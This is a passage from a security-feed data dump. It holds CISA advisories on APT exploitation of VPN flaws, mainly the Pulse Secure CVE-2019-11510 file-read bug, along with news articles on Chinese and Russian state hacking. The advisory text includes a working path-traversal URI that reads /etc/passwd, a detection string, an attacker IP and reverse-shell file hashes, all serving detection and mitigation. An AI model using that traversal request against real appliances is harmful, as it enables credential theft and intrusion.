[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) in your environment.\n\n### VPN Vulnerabilities\n\nImplement the following recommendations to secure your organization\u2019s VPNs:\n\n * **Update VPNs, network infrastructure devices, and devices **being used to remote into work environments with the latest software patches and security configurations. See CISA Tips [Understanding Patches and Software Updates](<https://us-cert.cisa.gov/ncas/tips/ST04-006>) and [Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>). Wherever possible, enable automatic updates. See table 1 for patch information on VPN-related CVEs mentioned in this report.\n * **Implement multi-factor authentication (MFA) on all VPN connections to increase security**. Physical security tokens are the most secure form of MFA, followed by authenticator app-based MFA. SMS and email-based MFA should only be used when no other forms are available. If MFA is not implemented, require teleworkers to use strong passwords. See CISA Tips [Choosing and Protecting Passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) and [Supplementing Passwords](<https://us-cert.cisa.gov/ncas/tips/ST05-012>) for more information.\n\nDiscontinue unused VPN servers. Reduce your organization\u2019s attack surface by discontinuing unused VPN servers, which may act as a point of entry for attackers. To protect your organization against VPN vulnerabilities:\n\n * **Audit **configuration and patch management programs.\n * **Monitor** network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., Secure Shell [SSH], SMB, RDP).\n * **Implement **MFA, especially for privileged accounts.\n * **Use **separate administrative accounts on separate administration workstations.\n * **Keep **[software up to date](<https://us-cert.cisa.gov/ncas/tips/ST04-006>). Enable automatic updates, if available. \n\n### How to uncover and mitigate malicious activity\n\n * **Collect and remove** for further analysis: \n * Relevant artifacts, logs, and data.\n * **Implement **mitigation steps that avoid tipping off the adversary that their presence in the network has been discovered.\n * **Consider **soliciting incident response support from a third-party IT security organization to: \n * Provide subject matter expertise and technical support to the incident response.\n * Ensure that the actor is eradicated from the network.\n * Avoid residual issues that could result in follow-up compromises once the incident is closed.\n\n### Resources\n\n * [CISA VPN-Related Guidance](<https://www.cisa.gov/vpn-related-guidance>)\n * CISA Infographic: [Risk Vulnerability And Assessment (RVA) Mapped to the MITRE ATT&CK FRAMEWORK](<https://www.cisa.gov/sites/default/files/publications/Risk%20and%20Vulnerability%20Assessment%20%28RVA%29%20Mapped%20to%20the%20MITRE%20ATT%26amp%3BCK%20Framework%20Infographic_v6-100620_%20508.pdf>)\n * National Security Agency InfoSheet: [Configuring IPsec Virtual Private Networks](<https://media.defense.gov/2020/Jul/02/2002355501/-1/-1/0/CONFIGURING_IPSEC_VIRTUAL_PRIVATE_NETWORKS_2020_07_01_FINAL_RELEASE.PDF>)\n * CISA Joint Advisory: [AA20-245A: Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>)\n * CISA Activity Alert: [AA20-073A: Enterprise VPN Security](<https://us-cert.cisa.gov/ncas/alerts/aa20-073a>)\n * CISA Activity Alert: [AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)\n * CISA Activity Alert: [AA20-010A: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)\n * **Cybersecurity Alerts and Advisories**: Subscriptions to [CISA Alerts](<https://public.govdelivery.com/accounts/USDHSUSCERT/subscriber/new>) and [MS-ISAC Advisories](<https://learn.cisecurity.org/ms-isac-subscription>)\n\n### Contact Information\n\nRecipients of this report are encouraged to contribute any additional information that they may have related to this threat.\n\nFor any questions related to this report or to report an intrusion and request resources for incident response or technical assistance, please contact:\n\n * CISA (888-282-0870 or [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>)), or\n * The FBI through the FBI Cyber Division (855-292-3937 or [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>)) or a [local field office](<https://www.fbi.gov/contact-us/field-offices/field-offices>)\n\n**_DISCLAIMER_**\n\n_This information is provided \"as is\" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information._\n\n_The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government._\n\n### References\n\n[[1] Fortinet Advisory: FG-IR-18-384 ](<https://www.fortiguard.com/psirt/FG-IR-18-384>)\n\n[[2] MobileIron Blog: MobileIron Security Updates Available](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>)\n\n[[3] Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)\n\n[[4] Microsoft: AD Forest Recovery - Resetting the krbtgt password](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)\n\n### Revisions\n\nOctober 9, 2020: Initial Version|October 11, 2020: Updated Summary|October 12, 2020: Added Additional Links\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-1631", "CVE-2020-2021", "CVE-2020-5902"], "modified": "2020-10-24T12:00:00", "id": "AA20-283A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T21:07:16", "description": "### Summary\n\n_**Note: ** This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/> \"Enterprise Matrix\" ) framework for all referenced threat actor techniques and mitigations._\n\nThis Alert provides an update to Cybersecurity and Infrastructure Security Agency (CISA) [Alert AA20-010A: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-010a> \"Continued Exploitation of Pulse Secure VPN Vulnerability\" ), which advised organizations to immediately patch CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure virtual private network (VPN) appliances.[[1]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101> \"Pulse Secure Community\" ) CISA is providing this update to alert administrators that threat actors who successfully exploited CVE-2019-11510 and stole a victim organization\u2019s credentials will still be able to access\u2014and move laterally through\u2014that organization\u2019s network after the organization has patched this vulnerability if the organization did not change those stolen credentials.\n\nThis Alert provides new detection methods for this activity, including a [CISA-developed tool](<https://github.com/cisagov/check-your-pulse> \"cisagov / check-your-pulse\" ) that helps network administrators search for indicators of compromise (IOCs) associated with exploitation of CVE-2019-11510. This Alert also provides mitigations for victim organizations to recover from attacks resulting from CVE-2019-11510. CISA encourages network administrators to remain aware of the ramifications of exploitation of CVE-2019-11510 and to apply the detection measures and mitigations provided in this report to secure networks against these attacks.\n\nFor a downloadable copy of IOCs, see STIX file.\n\n#### **Background**\n\nCISA has conducted multiple incident response engagements at U.S. Government and commercial entities where malicious cyber threat actors have exploited CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances\u2014to gain access to victim networks. Although Pulse Secure released patches for CVE-2019-11510 in April 2019,[[2]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101> \"Pulse Secure Community\" ) CISA has observed incidents where compromised Active Directory credentials were used months after the victim organization patched their VPN appliance.\n\n### Technical Details\n\nCISA determined that cyber threat actors have been able to obtain plaintext Active Directory credentials after gaining _Initial Access_ [[TA0001]](<https://attack.mitre.org/versions/v7/tactics/TA0001/> \"Initial Access\" ) to a victim organization\u2019s network via VPN appliances. Cyber threat actors used these _Valid Accounts_ [[T1078]](<https://attack.mitre.org/versions/v7/techniques/T1078/> \"Valid Accounts\" ) in conjunction with:\n\n * _External Remote Services_ [[T1133]](<https://attack.mitre.org/versions/v7/techniques/T1133> \"External Remote Services\" ) for access,\n * _Remote Services_ [[T1021]](<https://attack.mitre.org/versions/v7/techniques/T1021> \"Remote Services\" ) for _Lateral Movement _[[TA0008]](<https://attack.mitre.org/versions/v7/tactics/TA0008/> \"Lateral Movement\" ) to move quickly throughout victim network environments, and\n * _Data Encrypted for Impact_ [[T1486 ]](<https://attack.mitre.org/versions/v7/techniques/T1486> \"Data Encrypted for Impact\" ) for impact, as well as\n * _Exfiltration _[[TA0010]](<https://attack.mitre.org/versions/v7/tactics/TA0010/> \"Exfiltration\" ) and sale of the data.\n\n### Initial Access\n\nCVE-2019-11510 is a pre-authentication arbitrary file read vulnerability affecting Pulse Secure VPN appliances. A remote attacker can exploit this vulnerability to request arbitrary files from a VPN server. The vulnerability occurs because directory traversal is hard coded to be allowed if the path contains `dana/html5acc/`.[[3]](<https://twitter.com/XMPPwocky/status/1164874297690611713/photo/1> \"Twitter\" ),[[4]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848> \"184 Pulse Secure SSL VPN\" ) For example, a malicious cyber actor can obtain the contents of `/etc/passwd` [[5]](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh> \"BishopFox / pwn-pulse\" ) by requesting the following uniform resource identifier (URI):\n\n`https://vulnvpn.example[.]com/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/`\n\nObtaining the contents of `/etc/passwd` gives the attacker access to basic information about local system accounts. This request was seen in the proof of concept (POC) code for this exploit on [Github](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh> \"BishopFox / pwn-pulse\" ). An attacker can also leverage the vulnerability to access other files that are useful for remote exploitation. By requesting the data.mdb object, an attacker can leak plaintext credentials of enterprise users.[[6]](<https://www.exploit-db.com/exploits/47297> \"Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure \$Metasploit\$\" ),[[7]](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11> \"Twitter\" ),[[8]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848> \"184 Pulse Secure SSL VPN Vulnerability Being Exploited in the Wild\" )\n\nOpen-source reporting indicates that cyber threat actors can exploit CVE-2019-11510 to retrieve encrypted passwords;[[9]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?tab=comments#comment-887> \"184 Pulse Secure SSL VPN Vulnerability Being Exploited in the Wild\" ) however, CISA has not observed this behavior. By reviewing victim VPN appliance logs, CISA has noted cyber threat actors crafting requests that request files that allow for _Credential Dumping_ [[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003> \"OS Credential Dumping\" ) plaintext passwords from the VPN appliance.\n\n### Test Environment\n\nTo confirm the open-source reporting and validate what the cyber threat actors had access to, CISA used a test environment to send crafted requests. CISA used requests found both in proof-of-concept, open-source code and in requests from the logs of compromised victims. By doing so, CISA confirmed that plaintext Active Directory credentials were leaked and that it was possible to leak the local admin password to the VPN appliance. (See figure 1.)\n\n![](/sites/default/files/publications/AA20-107A-figure_1.png)\n\n##### Figure 1: Exploitation of the VPN appliance leading to plaintext local admin credentials\n\nCISA\u2019s test environment consisted of a domain controller (DC) running Windows Server 2016, an attacker machine, and a Pulse Secure VPN appliance version 9.0R3 (build 64003). CISA connected the attacker machine to the external interface of the Pulse Secure VPN appliance and the DC to the internal interface.\n\nCISA created three accounts for the purpose of validating the ability to compromise them by exploiting CVE-2019-11510.\n\n * Local Pulse Secure Admin account \n * Username: `admin`; Password: `pulse-local-password`\n * Domain Administrator Account \n * Username: `Administrator`; Password: `domain-admin-password1`\n * CISA-test-user Account \n * Username: `cisa-test-user`; Password: `Use_s3cure_passwords`\n\nAfter creating the accounts, CISA joined the VPN appliance to the test environment domain, making a point not to cache the domain administrator password. (See figure 2.)\n\n![](/sites/default/files/publications/AA20-107A-figure_2.png)\n\n##### Figure 2: VPN appliance joined to the domain without caching the domain administrator password\n\nCISA used a similar file inclusion to test the ability to _Credential Dump _[[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003> \"OS Credential Dumping\" ) the domain administrator password. CISA determined it was possible to leak the domain administrator password that was used to join the device to the domain without saving the credentials. Refer to figure 3 for the URI string tested by CISA.\n\n![](/sites/default/files/publications/AA20-107A-figure_3.png)\n\n##### Figure 3: Exploitation of the VPN appliance leading to cleartext domain admin credentials\n\nNext, CISA validated the ability to _Credential Dump _[[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003> \"OS Credential Dumping\" ) a user password from the VPN appliance. To do this, CISA created a _user realm _(Pulse Secure configuration terminology) and configured its roles/resource groups to allow for Remote Desktop Protocol (RDP) over HTML5 (Apache Guacamole). After using the new user to remotely access an internal workstation over RDP, CISA used a crafted request (see figure 4) to leak the credentials from the device. (**Note:** the path to stored credentials is publicly available.)[[10]](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11>)\n\n![](/sites/default/files/publications/AA20-107A-figure_4.png)\n\n##### Figure 4: Exploitation of the VPN appliance leading to plaintext user credentials\n\nThis test confirmed CISA\u2019s suspicion that threat actors had access to each of the various compromised environments.\n\n### Cyber Threat Actor Behavior in Victim Network Environments\n\nCISA observed\u2014once credentials were compromised\u2014cyber threat actors accessing victim network environments via the Pulse Secure VPN appliances. Cyber threat actors used _Connection Proxies _[[T1090]](<https://attack.mitre.org/versions/v7/techniques/T1090> \"Proxy\" )\u2014such as Tor infrastructure and virtual private servers (VPSs)\u2014to minimize the chance of detection when they connected to victim VPN appliances.\n\nUsing traditional host-based analysis, CISA identified the following malicious cyber actor actions occurring in a victim\u2019s environment:\n\n * Creating persistence via scheduled tasks/remote access trojans\n * Amassing files for exfiltration\n * Executing ransomware on the victim\u2019s network environment\n\nBy correlating these actions with the connection times and user accounts recorded in the victim\u2019s Pulse Secure `.access` logs, CISA was able to identify unauthorized threat actor connections to the victim\u2019s network environment. CISA was then able to use these Internet Protocol (IP) addresses and user-agents to identify unauthorized connections to the network environments of other victims. Refer to the Indicators of Compromise section for the IP addresses CISA observed making these unauthorized connections.\n\nIn one case, CISA observed a cyber threat actor attempting to sell the stolen credentials after 30 unsuccessful attempts to connect to the customer environment to escalate privileges and drop ransomware. CISA has also observed this threat actor successfully dropping ransomware at hospitals and U.S. Government entities.\n\nIn other cases, CISA observed threat actors leveraging tools, such as LogMeIn and TeamViewer, for persistence. These tools would enable threat actors to maintain access to the victim\u2019s network environment if they lost their primary connection.\n\n### Initial Detection\n\nConventional antivirus and endpoint detection and response solutions did not detect this type of activity because the threat actors used legitimate credentials and remote services. \n\nAn intrusion detection system may have noticed the exploitation of CVE-2019-11510 if the sensor had visibility to the external interface of the VPN appliance (possible in a customer\u2019s demilitarized zone) and if appropriate rules were in place. Heuristics in centralized logging may have been able to detect logins from suspicious or foreign IPs, if configured.\n\n### Post-Compromise Detection and IOC Detection Tool\n\nGiven that organizations that have applied patches for CVE-2019-11510 may still be at risk for exploitation from compromises that occurred pre-patch, CISA developed detection methods for organizations to determine if their patched VPN appliances have been targeted by the activity revealed in this report.\n\nTo detect past exploitation of CVE-2019-11510, network administrators should:\n\n 1. Turn on unauthenticated log requests (see figure 5). (**Note:** there is a risk of overwriting logs with unauthenticated requests so, if enabling this feature, be sure to frequently back up logs; if possible, use a remote syslog server.) \n\n![](/sites/default/files/publications/AA20-107A-figure_5.png)\n\n##### Figure 5: Checkbox that enables logging exploit attacks\n\n 2. Check logs for exploit attempts. To detect lateral movement, system administrators should look in the logs for strings such as` ../../../data `(see figure 6). \n\n![](/sites/default/files/publications/AA20-107A-figure_6.png)\n\n##### Figure 6: Strings for detection of lateral movement\n\n 3. Manually review logs for unauthorized sessions and exploit attempts, especially sessions originating from unexpected geo-locations.\n 4. Run CISA\u2019s IOC detection tool. CISA developed a tool that enables administrators to triage logs (if authenticated request logging is turned on) and automatically search for IOCs associated with exploitation of CVE-2019-11510. CISA encourages administrators to visit [CISA\u2019s GitHub page](<https://github.com/cisagov/check-your-pulse> \"cisagov / check-your-pulse\" ) to download and run the tool. While not exhaustive, this tool may find evidence of attempted compromise.\n\n### Indicators of Compromise\n\nCISA observed IP addresses making unauthorized connections to customer infrastructure. (**Note:** these IPs were observed as recently as February 15, 2020.) The IP addresses seen making unauthorized connections to customer infrastructure were different than IP addresses observed during initial exploitation. Please see the STIX file below for IPs.\n\nCISA observed the following user agents with this activity:\n\n * Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0\n * Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0\n * Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55[.]0.2883.87 Safari/537.36\n\nCISA also observed:\n\n * A cyber threat actor renaming portable executable (PE) files in an attempt to subvert application allow listing or antivirus (AV) protections. See table 1 for hashes of files used.\n * A threat actor \u201cliving off the land\u201d and utilizing C:\\Python\\ArcGIS to house malicious PE files, as well as using natively installed Python.\n * A threat actor attack infrastructure: 38.68.36(dot)112 port 9090 and 8088\n\n##### Table 1: Filenames and hashes of files used by a threat actor\n\nFilename | MD5 \n---|--- \nt.py (tied to scheduled task, python meterpreter reverse shell port 9090) | 5669b1fa6bd8082ffe306aa6e597d7f5 \ng.py (tied to scheduled task, python meterpreter reverse shell port 8088) | 61eebf58e892038db22a4d7c2ee65579 \n \nFor a downloadable copy of IOCs, see STIX file.\n\n### Mitigations\n\nCISA strongly urges organizations that have not yet done so to upgrade their Pulse Secure VPN to the corresponding patches for CVE-2019-11510. If\u2014after applying the detection measures in this alert\u2014organizations detect evidence of CVE-2019-11510 exploitation, CISA recommends changing passwords for all Active Directory accounts, including administrators and services accounts.\n\nCISA also recommends organizations to:\n\n * Look for unauthorized applications and scheduled tasks in their environment.\n * Remove any remote access programs not approved by the organization.\n * Remove any remote access trojans.\n * Carefully inspect scheduled tasks for scripts or executables that may allow an attacker to connect to an environment.\n\nIf organizations find evidence of malicious, suspicious, or anomalous activity or files, they should consider reimaging the workstation or server and redeploying back into the environment. CISA recommends performing checks to ensure the infection is gone even if the workstation or host has been reimaged.\n\n### Contact Information\n\nTo report suspicious activity related to information found in this joint Cybersecurity Advisory, contact CISA\u2019s 24/7 Operations Center at report@cisa.gov or (888) 282-0870. When available, please include the information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.\n\n**References**\n\n[[1] Pulse Secure Advisory SA44101 ](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101> \"Pulse Secure Community\" )\n\n[[2] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101> \"Pulse Secure Community\" )\n\n[[3] Twitter. @XMPPwocky. (2019, August 23). Your least favorite construct ](<https://twitter.com/XMPPwocky/status/1164874297690611713/photo/1> \"XMPPwocky\" )\n\n[[4] OpenSecurity Forums. Public vulnerability discussion. (2019, August 23). ](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848> \"OpenSecurity Forums\" )\n\n[[5] GitHub. BishopFox / pwn-pulse. ](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh> \"BishopFox / pwn-pulse\" )\n\n[[6] File disclosure in Pulse Secure SSL VPN (Metasploit) ](<https://www.exploit-db.com/exploits/47297> \"Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure \$Metasploit\$\" )\n\n[[7] Twitter. @alyssa_herra ](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11> \"Twitter\" )\n\n[[8] OpenSecurity Forums. Public vulnerability discussion. (2019, August 23). ](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848> \"OpenSecurity Forums\" )\n\n[[9] OpenSecurity Forums. Public vulnerability discussion. (2019, August 31). ](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?tab=comments#comment-887> \"OpenSecurity Forums\" )\n\n[[10] Twitter. @alyssa_herra](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11> \"Twitter\" )\n\n### Revisions\n\nApril 16, 2020: Initial Version\n\nOctober 23, 2020: Revision\n\nSeptember 05, 2023: Revision\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Continued Threat Actor Exploitation Post Pulse Secure VPN Patching", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2020-10-24T12:00:00", "id": "AA20-107A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-107a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:40:09", "description": "[![Chinese Hackers](https://thehackernews.com/images/-S81ZTpL3VW0/X2CFi_g7l0I/AAAAAAAAAww/bXeyXz56F-0V-P2VhHdoO5qJllbhNqfswCLcBGAsYHQ/s728-e100/hacking.jpg)](<https://thehackernews.com/images/-S81ZTpL3VW0/X2CFi_g7l0I/AAAAAAAAAww/bXeyXz56F-0V-P2VhHdoO5qJllbhNqfswCLcBGAsYHQ/s728-e100/hacking.jpg>)\n\nThe US Cybersecurity and Infrastructure Security Agency (CISA) issued a [new advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-258a>) on Monday about a wave of cyberattacks carried by Chinese nation-state actors targeting US government agencies and private entities. \n \n\"CISA has observed Chinese [Ministry of State Security]-affiliated cyber threat actors operating from the People's Republic of China using commercially available information sources and open-source exploitation tools to target US Government agency networks,\" the cybersecurity agency said. \n \nOver the past 12 months, the victims were identified through sources such as [Shodan](<https://www.shodan.io/>), the Common Vulnerabilities and Exposure ([CVE](<https://cve.mitre.org/>)) database, and the National Vulnerabilities Database (NVD), exploiting the public release of a vulnerability to pick vulnerable targets and further their motives. \n \nBy compromising legitimate websites and leveraging spear-phishing emails with malicious links pointing to attacker-owned sites in order to gain initial access, the Chinese threat actors have deployed open-source tools such as [Cobalt Strike](<https://www.cobaltstrike.com/>), [China Chopper Web Shell](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html>), and [Mimikatz](<https://github.com/gentilkiwi/mimikatz>) credential stealer to extract sensitive information from infected systems. \n \nThat's not all. Taking advantage of the fact that organizations aren't quickly mitigating known software vulnerabilities, the state-sponsored attackers are \"targeting, scanning, and probing\" US government networks for unpatched flaws in F5 Networks Big-IP Traffic Management User Interface ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), Citrix VPN ([CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)), Pulse Secure VPN ([CVE-2019-11510](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)), and Microsoft Exchange Servers ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)) to compromise targets. \n \n\"Cyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks,\" the agency said. \"While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals.\" \n \nThis is not the first time Chinese actors have worked on behalf of China's MSS to infiltrate various industries across the US and other countries. \n \nIn July, the US Department of Justice (DoJ) [charged two Chinese nationals](<https://thehackernews.com/2020/07/chinese-hackers-covid19.html>) for their alleged involvement in a decade-long hacking spree spanning high tech manufacturing, industrial engineering, defense, educational, gaming software, and pharmaceutical sectors with an aim to steal trade secrets and confidential business information. \n \nBut it's not just China. Earlier this year, Israeli security firm ClearSky uncovered a cyberespionage campaign dubbed \"[Fox Kitten](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>)\" that targeted government, aviation, oil and gas, and security companies by exploiting unpatched VPN vulnerabilities to penetrate and steal information from target companies, prompting CISA to issue [multiple security alerts](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>) urging businesses to secure their VPN environments. \n \nStating that sophisticated cyber threat actors will continue to use open-source resources and tools to single out networks with low-security posture, CISA has recommended organizations to patch [routinely exploited vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>), and \"audit their configuration and patch management programs to ensure they can track and mitigate emerging threats.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T09:14:00", "type": "thn", "title": "CISA: Chinese Hackers Exploiting Unpatched Devices to Target U.S. Agencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902"], "modified": "2020-09-15T09:14:30", "id": "THN:0E6CD47141AAF54903BD6C1F9BD96F44", "href": "https://thehackernews.com/2020/09/chinese-hackers-agencies.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:41", "description": "[![solarwinds backdoor](https://thehackernews.com/images/-Cpd5jYOBXGk/X9b7WId_6xI/AAAAAAAABPY/RSyw2zajv6MRRJNaCspQPEerTW8vEpNpACLcBGAsYHQ/s728-e1000/solarwinds.jpg)](<https://thehackernews.com/images/-Cpd5jYOBXGk/X9b7WId_6xI/AAAAAAAABPY/RSyw2zajv6MRRJNaCspQPEerTW8vEpNpACLcBGAsYHQ/s0/solarwinds.jpg>)\n\nState-sponsored actors allegedly working for Russia have [targeted](<https://www.washingtonpost.com/national-security/russian-government-spies-are-behind-a-broad-hacking-campaign-that-has-breached-us-agencies-and-a-top-cyber-firm/2020/12/13/d5a53b88-3d7d-11eb-9453-fc36ba051781_story.html>) the US Treasury, the Commerce Department's National Telecommunications and Information Administration (NTIA), and other government agencies to [monitor internal email traffic](<https://www.reuters.com/article/us-usa-cyber-amazon-com-exclsuive/exclusive-u-s-treasury-breached-by-hackers-backed-by-foreign-government-sources-idUSKBN28N0PG>) as part of a widespread cyberespionage campaign.\n\nThe Washington Post, citing unnamed sources, said the latest attacks were the work of APT29 or Cozy Bear, the same hacking group that's believed to have orchestrated a breach of US-based cybersecurity firm [FireEye](<https://thehackernews.com/2020/12/cybersecurity-firm-fireeye-got-hacked.html>) a few days ago leading to the theft of its Red Team penetration testing tools.\n\nThe motive and the full scope of what intelligence was compromised remains unclear, but signs are that adversaries tampered with a software update released by Texas-based IT infrastructure provider SolarWinds earlier this year to infiltrate the systems of government 